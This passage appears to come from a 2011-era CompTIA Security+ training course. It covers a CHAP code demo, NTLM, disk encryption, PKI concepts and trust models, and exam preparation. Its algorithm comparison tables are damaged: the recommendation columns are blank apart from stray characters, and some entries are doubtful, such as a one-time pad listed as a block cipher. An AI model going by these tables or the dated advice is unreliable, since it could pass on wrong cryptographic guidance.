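    identifier, challenge = server.issue_challenge(username)
    return server.check_response(username, chap_response(identifier, secret, challenge))


if __name__ == "__main__":
    srv = ChapServer({"alice": b"correct horse battery staple"})   # constructed sample
    print("right secret:", client_login(srv, "alice", b"correct horse battery staple"))
    print("wrong secret:", client_login(srv, "alice", b"guess"))
```

The security of the exchange rests entirely on the secret's unpredictability: anyone who records a challenge and response can test candidate secrets offline against them, which is the dictionary-attack exposure the slide lists, so the shared secret should be long and random rather than a user-chosen password.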
NTLM and NTLMv2 (NT LAN Manager and NT LAN Manager Version 2)
• Used For
–Windows authentication
• NTLM for early versions of Windows NT
• NTLMv2 after Windows NT SP4
• How It Works
–Challenge response
–Uses MD4/MD5 hashing
–NTLMv2 takes additional steps for randomization and security
• History
–A replacement for LANMAN
• Security Considerations
–NTLM is vulnerable to spoofing attacks
–Still in use for backward compatibility
Whole Disk Encryption
• Used For
–Data confidentiality
–Protects an entire disk in the event a laptop or other mobile device is lost or stolen
• How It Works
–Uses a key to encrypt everything on the drive, including the operating system
–Available built into the operating system, as third-party software, as USB hardware, in an HSM, or built into some hard drives
–Some options require a TPM chip
• Security Considerations
–If you lose your key you lose your data
• Some enterprise systems have key recovery options
Comparative Strengths of Algorithms
Comparative Strength of Data Confidentiality Algorithms
| Algorithm | Key Length | Mode | Should I Use It? |
|---|---|---|---|
| DES | 64-bit | Block | |
| 3DES | 168-bit | Block | K |
| AES | 128-bit, 192-bit, or 256-bit | Block | |
| RC4 | Variable | Stream | |
| Blowfish | 64-bit | Block | |
| Twofish | 128-bit | Block | |
| One-time Pad | ≥ Message Length | Block | K |
Comparative Strength of Data Integrity Algorithms
| Algorithm | Hash Length | Rounds | Should I Use It? |
|---|---|---|---|
| SHA-1 | 160-bit | 80 | |
| SHA-2 | 256-bit or more | 64 or 80 | |
| MD5 | 128-bit | 4 | |
| RIPEMD | Variable | 3 | |
| RIPEMD-160 | 160-bit | 3 | K |
| HMAC | Dependent on hashing algorithm used | Dependent on hashing algorithm used | |
What We Covered
Symmetric Encryption
DES
3DES
AES
RC4
Blowfish
Twofish
Asymmetric Encryption
Diffie-Hellman
RSA
ECC
Cryptographic Hashing
SHA
MD5
RIPEMD
HMAC
Transport Encryption
SSL/TLS and HTTPS
SSH
IPSec
Wireless Encryption
WEP vs. WPA/WPA2
Wi-Fi Authentication
Other Encryption Tools
PGP/GPG
One-time Pads
CHAP and PAP
NTLM and NTLMv2
Whole Disk Encryption
Comparative Strengths of Algorithms
Data Confidentiality Algorithms
Data Integrity Algorithms
CompTIA Security+ Training Instructor: Lisa Szpunar
Public Key Infrastructure (PKI) Concepts
In This Lesson:
Exam Objective: 6.3 Explain the core concepts of public key infrastructure
Public Key Infrastructure (PKI) Overview
The Public and Private Key Pair
Digital Certificates
Certificate Authorities (CA)
How PKI Works
Registration Authorities (RA)
Certificate Revocation Lists (CRL)
Recovery Agent: What if a Key Gets Lost?
Key Escrow
Public Key Infrastructure (PKI) Overview
• A two-key (asymmetric) encryption system for communication
• A framework, not a specific technology
• Universal infrastructure that can work across multiple systems and vendors
• Provides authentication and confidentiality
–Authentication: Confirms the owner of the keys using Digital Certificates
–Confidentiality: Encrypts data transmissions
The Public and Private Key Pair
1. You request Alice’s public key
2. Alice sends her public key
3. You use Alice’s public key to encrypt the message
4. You send the encrypted message to Alice
5. Alice uses her private key to decrypt the message and read it
Digital Certificates
• Helps with authentication
• Associates a public key with an individual/company
• Issued by a Certificate Authority
X.509 Certificate fields:
–Version
–Serial Number
–Algorithm ID
–Issuer
–Validity (Not Before, Not After)
–Subject
–Subject Public Key Info (Public Key Algorithm, Subject Public Key)
–Issuer Unique Identifier (optional)
–Subject Unique Identifier (optional)
–Extensions (optional)
–Certificate Signature Algorithm
–Certificate Signature
Certificate Authorities (CA)
• Responsible for issuing, revoking, and distributing certificates
• Often a trusted third-party organization. Examples:
–DigiCert
–VeriSign
• Companies or organizations can have an in-house CA
• Stores the public key in a directory that is available to anyone who wants to verify your certificate
How PKI Works
1. You encrypt your message using Alice’s verified public key contained within the certificate issued by the CA
2. You send the encrypted message to Alice
3. Alice decrypts the message with her private key
Registration Authorities (RA)
• The front-end entity that you actually interact with
• You provide the RA with your information (and payment)
• Verifies identity documentation before confirming that the CA can issue the certificate
• Does not sign the certificate
Certificate Revocation Lists (CRL)
• The CA publishes a list of certificates that can no longer be used
• Reasons a cert might be on the CRL
–Certificate Expiration
–Certificate Revocation (Permanent)
• Compromised private key
• Human Resources reasons
• Company changes its name, physical address, or DNS
• Any reason prior to expiration
–Certificate Suspended
• Will say “Certificate Hold” as the reason for revocation
• Certificate owner/administrator can request the cert be revoked
Recovery Agent: What if a Key Gets Lost?
• A live person!
• Has access to the key recovery server
• Normally used by in-house CA implementations
• Sometimes two different recovery agents are both needed to recover one key
• Key recovery information (KRI)
–Proof that the request is from an authorized recovery agent
–Name of key owner
–Time key was created
–Issuing CA server
Key Escrow
• A copy (or copies) of your private key is kept in a key escrow agency or key archival system
–Sometimes there are multiple databases, with only part of the private key kept in each
• Used for law enforcement (with a warrant)
Key Terms You Should Know
| Term | Definition |
|---|---|
| Public Key Infrastructure | PKI is the framework for encryption that associates a public key with a verified person/system |
| Public Key | The part of the key pair that is available and distributed to the public |
| Private Key | The part of the key pair that is secret and used only by the key owner |
| Certificate Authorities | CAs are responsible for issuing, revoking, and distributing digital certificates |
| Digital Certificates | A certificate that verifies to whom the public key belongs |
| Registration Authority | The RA verifies the prospective key owner’s identity and sends it to the CA to issue a certificate |
| Certificate Revocation Lists | A list of certificates that are no longer usable. The list is frequently published |
| Recovery Agent | A person who is authorized to recover lost private keys |
| Key Escrow | Keeping secured copies of private keys for law enforcement purposes |
What We Covered
Public Key Infrastructure (PKI) Overview
The Public and Private Key Pair
Digital Certificates
Certificate Authorities (CA)
How PKI Works
Registration Authorities (RA)
Certificate Revocation Lists (CRL)
Recovery Agent: What if a Key Gets Lost?
Key Escrow
CompTIA Security+ Training Instructor: Lisa Szpunar
PKI Implementation
In This Lesson:
Exam Objective: 6.4 Implement PKI, certificate management, and associated components
Publicly Trusted Certificate Authorities
Internal Certificate Authorities
Working with Registration Authorities
Key Management
Certificate Management
Trust Models
• Hierarchical
• Bridge
• Mesh
• Hybrid
Publicly Trusted Certificate Authorities
• A trusted third party (TTP) issues and signs your digital certificate
• Web browsers already trust these TTP CAs
• Available commercially
–VeriSign, Go Daddy, DigiCert
• Best used for publicly facing websites
–A self-signed cert will confuse and alarm customers
• Pros
–Publicly trusted
–Very little management overhead
• Cons
–Expensive to purchase multiple certificates
Internal Certificate Authorities
• Used for intranets and other internal uses
–Hard drive and file encryption
–Digitally signing documents
• Pros
–Lower cost
–Greater control
• Cons
–Intensive management overhead
• Configuring and troubleshooting support for the protocols, systems, and applications at your company
• What trust model to use and its scalability
• Interoperability with business partners
• Server operating systems can be configured to provide PKI services
• Microsoft Stand-alone CAs vs. Enterprise CAs
–Stand-alone CAs do not need Active Directory directory services to function
• There can still be subordinate CAs
–Enterprise CAs rely on Active Directory for their directory services
Working with Registration Authorities
• Great for verifying user credentials in person
• Local registration authorities (LRA)
–Useful for internal PKIs that have distributed locations
[Diagram: LRA at the Chicago Branch Office, CA at the New York Central Office]
Key Management
• Key generation and signing
• Centralized keys
–Created and stored by the CA
• Decentralized keys
–Created by the user and submitted to the CA to sign
• Key repository
–Public keys can be centrally located in a key repository
• Key recovery
–Key archiving
• Configure tools built in to your internal PKI to do this automatically
–Assign users to be recovery agents
–M of N control
• M employees out of N recovery agents need to be involved in key recovery
Certificate Management
• Create and handle PKI certs in accordance with the organization’s overall security policy
• Certificate policies
–Policies for certificate issuing, usage, renewal, and archiving
• Certificate Practice Statement (CPS)
–The procedures that a CA will follow and expects its users to follow
[Diagram: Security Policy → Certificate Policies → Certificate Practice Statement]
Certificate Management: Life Cycle
[Diagram: Request or Renewal → Issuing → Use → Expiration or Revocation → Destruction → Request or Renewal]
Request or Renewal
• A request is sent to the RA, or directly to the CA if an RA does not exist
• A renewal request is made prior to an existing certificate’s expiration
• The requester’s identity is verified
Issuing
• A key pair is generated
• The corresponding cert is created, signed, and sent to the requester
Certificate Use
• The certificate is used by its owner until its expiration date
• If the private key is compromised the owner must notify the CA
Expiration or Revocation
• The user must notify the CA/RA immediately if a private key was lost or compromised
• An expired or revoked certificate is placed on the CRL
• The CRL is published and the information is disseminated
Destruction
• Permanently removing keys/certs that are no longer needed
• Only the private key needs to be deleted because the public key is useless without its private counterpart
Trust Models
• Single CA
–A small PKI implementation with only one root CA
• Hierarchical
–A top-down trust structure
–The higher CAs sign the certificates of their subordinate CAs
• Mesh
–Two-way trust (cross certification) happens between all CAs
–Each CA is both the root and the subordinate
• Bridge
–A two-way trust exists between two hierarchical PKIs
• Hybrid
–A mix of two or more models for the most flexible structure
[Diagram, Hierarchical Trust Model: Root CA → Intermediate CAs → Leaf CAs (subordinate CAs), with an RA attached to a CA]
[Diagram, Mesh Trust Model: three CAs, each cross-certified with the others]
[Diagram, Bridge Trust Model: a Bridge CA linking two hierarchies]
Key Terms You Should Know
| Term | Definition |
|---|---|
| Local Registration Authority | A local authority used to identify an individual for certificate issuance even if the CA is located elsewhere |
| M of N Control | When referring to private key recovery: out of N total recovery agents, only M need to be present to recover a key |
| Certificate Policies | PKI certificate policies that align with the overall security policies for the organization. Includes policies for certificate issuing, usage, renewal, and archiving certificates and keys |
| Certificate Practice Statement | The procedures that a CA will follow and expects its users to follow. These procedures are derived from the PKI certificate policies |
| Hierarchical Trust Model | A top-down trust model where each level of CAs signs the certificates for the CAs directly below them, except for the root CA, which signs its own certificate |
| Bridge Trust Model | A bridge CA creates a cross-certification between two PKI trust structures |
| Mesh Trust Model | A cross-certification happens between pairs of CAs, creating a mesh structure. Every CA is both the root and the subordinate |
| Hybrid Trust Model | A combination of any two or more trust models |
What We Covered
Publicly Trusted Certificate Authorities
Internal Certificate Authorities
Working with Registration Authorities
Key Management
Certificate Management
Trust Models
• Hierarchical
• Bridge
• Mesh
• Hybrid
CompTIA Security+ Training Instructor: Lisa Szpunar
Preparing for Your CompTIA Security+ SY0-301 Certification Exam
In This Lesson:
About the Exam
Mapping Exam Objectives to This Course
Studying for the Exam
Test Day Tips
About the Exam
• Exam code SY0-301 (replaced SY0-201 in December 2011)
• 100 questions
• 90 minutes
• A passing score is 750 out of 900 points
• Recommended experience:
–CompTIA Network+ certification
–Two years of technical networking experience, with an emphasis on security
• Take the exam through Pearson VUE or Prometric
• Accredited by
–International Organization for Standardization (ISO)
–American National Standards Institute (ANSI)
• Topic Domains
–Network security
–Compliance and operational security
–Threats and vulnerabilities
–Application, data, and host security
–Access control and identity management
–Cryptography
Mapping Exam Objectives to This Course
Each exam objective is listed with the course lesson(s) that cover it.
1.0 Network Security
1.1 Explain the security function and purpose of network devices and technologies
–Network Device Security
1.2 Apply and implement secure network administration principles
–Secure Network Administration
1.3 Distinguish and differentiate network design elements and compounds
–Secure Network Design
1.4 Implement and use common protocols
–TCP/IP Protocols and Port Security
1.5 Identify commonly used default network ports
–TCP/IP Protocols and Port Security
1.6 Implement wireless networks in a secure manner
–Securing Wireless Networks
2.0 Compliance and Operational Security
2.1 Explain risk related concepts
–Risk Mitigation and Deterrence
–Risk Management
2.2 Carry out appropriate risk mitigation strategies
–Risk Mitigation and Deterrence
2.3 Execute appropriate incident response procedures
–Incident Response
2.4 Explain the importance of security related awareness and training
–User Education
2.5 Compare and contrast aspects of business continuity
–Business Continuity
2.6 Explain the impact and proper use of environmental controls
–Physical and Environmental Security
2.7 Execute disaster recovery plans and procedures
–Disaster Recovery Planning
2.8 Exemplify the concepts of confidentiality, integrity, and availability
–Introduction to IT Security
3.0 Threats and Vulnerabilities
3.1 Analyze and differentiate among types of malware
–Malware Prevention and Cleanup
3.2 Analyze and differentiate among types of attacks
–Types of Attacks
3.3 Analyze and differentiate among types of social engineering attacks
–Social Engineering
3.4 Analyze and differentiate among types of wireless attacks
–Attacks on Wireless Networks
3.5 Analyze and differentiate among types of application attacks
–Securing Applications
3.6 Analyze and differentiate among types of mitigation and deterrent techniques
–Secure Network Administration
–Risk Mitigation and Deterrence
–Log Monitoring and Reporting
–Physical and Environmental Security
3.7 Implement assessment tools and techniques to discover security threats and vulnerabilities
–Risk Management
–Threat and Vulnerability Assessment and Detection
3.8 Within the realm of vulnerability assessments, explain the proper use of penetration testing versus vulnerability scanning
–Risk Management
–Threat and Vulnerability Assessment and Detection
4.0 Application, Data, and Host Security
4.1 Explain the importance of application security
–Securing Applications
4.2 Carry out appropriate procedures to establish host security
–Host Security
–Physical and Environmental Security
4.3 Explain the importance of data security
–Data Security
5.0 Access Control and Identity Management
5.1 Explain the function and purpose of authentication services
–Authentication Services
5.2 Explain the fundamental concepts and best practices related to authentication, authorization, and access control
–Authentication Services
–Authentication, Authorization, and Access Control
5.3 Implement appropriate security controls when performing account management
–User Account Management
6.0 Cryptography
6.1 Summarize general cryptography concepts
–Cryptography Concepts
6.2 Use and apply appropriate cryptographic tools and products
–Cryptography Tools
6.3 Explain the core concepts of public key infrastructure
–Public Key Infrastructure (PKI) Concepts
6.4 Implement PKI, certificate management, and associated components
–PKI Implementation
• Rewatch lessons
• Transcender study materials
• Vocabulary document
• Acronym document
Studying for the Exam
• Arrive 15 to 30 minutes before the test is scheduled to begin
• You must bring two forms of identification
–One must be a current, government-issued photo ID
–Both must have your signature
• Do not bring personal items into the testing center
–No notes, mobile phones, or calculators
• Be prepared
–Study!
–Get a good night of sleep
Test Day Tips
CompTIA Security+ Training Instructor: Lisa Szpunar
Next Steps
CompTIA Security+ Training
Next Steps
In This Lesson:
What We Have Covered in This Course
My Favorite Supporting Resources
Get Certified
Continue Learning
Join the Community
We Value Your Opinion
What We Have Covered in This Course
Getting Started with CompTIA Security+ Training
Introduction to IT Security
Types of Attacks
Malware Prevention and Cleanup
Network Device Security
Secure Network Administration
Secure Network Design
TCP/IP Protocols and Port Security
What We Have Covered in This Course
Attacks on Wireless Networks
Securing Wireless Networks
Host Security
Securing Applications
Data Security
Authentication, Authorization, and Access Control
Physical and Environmental Security
Authentication Services
User Account Management
What We Have Covered in This Course
Risk Management
Threat and Vulnerability Assessment and Detection
Risk Mitigation and Deterrence
Log Monitoring and Reporting
Business Continuity
Disaster Recovery Planning
Incident Response
User Education
Social Engineering
What We Have Covered in This Course
Cryptography Concepts
Cryptography Tools
Public Key Infrastructure (PKI) Concepts
PKI Implementation
Preparing for Your CompTIA Security+ SY0-301 Certification Exam
Next Steps
My Favorite Supporting Resources
• Information About the Exam: http://certification.comptia.org/getCertified/certifications/security.aspx
• My Favorite Security+ Book:
Dulaney, Emmett A. CompTIA Security+ Deluxe Study Guide: Exam SY0-301. Indianapolis: Wiley Technology Pub., 2011.
• National Institute of Standards and Technology – Information Technology Portal:
http://www.nist.gov/information-technology-portal.cfm
• Aligned with this course
–CompTIA Security+ exam number SY0-301
–Watch the lesson titled “Preparing for Your CompTIA Security+ SY0-301 Certification Exam”
–Watch the Transcender lessons
• Entry Level Networking
–CompTIA Network+
• Advanced Security Certifications
–CASP: CompTIA Advanced Security Practitioner – CompTIA
–CISSP: Certified Information Systems Security Professional – ISC2
• Specific Security Specialization Certifications
Get Certified
Continue Learning: Specialized Certifications
Listed by topic as acronym, certification name, and certifying body
Auditing Techniques
–GSNA: GIAC Systems and Network Auditor (GIAC)
–CISA: Certified Information Systems Auditor (ISACA)
Penetration Testing
–CEH: Certified Ethical Hacker (EC-Council)
Wireless Security
–CWSP: Certified Wireless Security Professional (CWNP)
Computer Forensics
–CHFI: Computer Hacking Forensic Investigator (EC-Council)
Secure Coding Practices
–CSSLP: Certified Secure Software Lifecycle Professional (ISC2)
–GSSP: GIAC Secure Software Programmer (GIAC)
• Topics for Further Study
–Windows or other OS specific security
–Application security
–Auditing techniques
–Penetration testing
–Wireless security
–Computer forensics
–Mobile device security
Continue Learning
• Blogs/Newsletters
–Schneier on Security: www.schneier.com
• Magazines
–Search Security: searchsecurity.techtarget.com
–SC MAGAZINE: www.scmagazineus.com
• Podcasts
–Network Security Podcast: netsecpodcast.com
–CyberSpeak's Podcast: cyberspeak.libsyn.com
Continue Learning
• Professional Organizations
–Information Systems Security Association (ISSA): www.issa.org/
–Information Systems Audit and Control Association (ISACA): www.isaca.org/
–Information Security Forum: www.securityforum.org/
• Connect with other IT security pros, organizations, and vendors through social media
–Forums
Join the Community
We Value Your Opinion
There are so many ways to reach us!
• Call us at 1-888-229-5055 (worldwide: 1-847-776-8800)
• Email us at [email protected]
• Post on our forums at http://forums.trainsignal.com/
Join the TrainSignal Conversation
• Check Out Our Blog: http://www.trainsignal.com/blog
• Become a Fan on Facebook: http://www.facebook.com/trainsignal
• Follow Us on Twitter: http://twitter.com/trainsignal
• Follow Me on Twitter: http://twitter.com/Lisa_Spooner
• Find Info on IT Training: http://www.trainsignal.com
• View Our YouTube Channels: http://www.youtube.com/trainsignalinc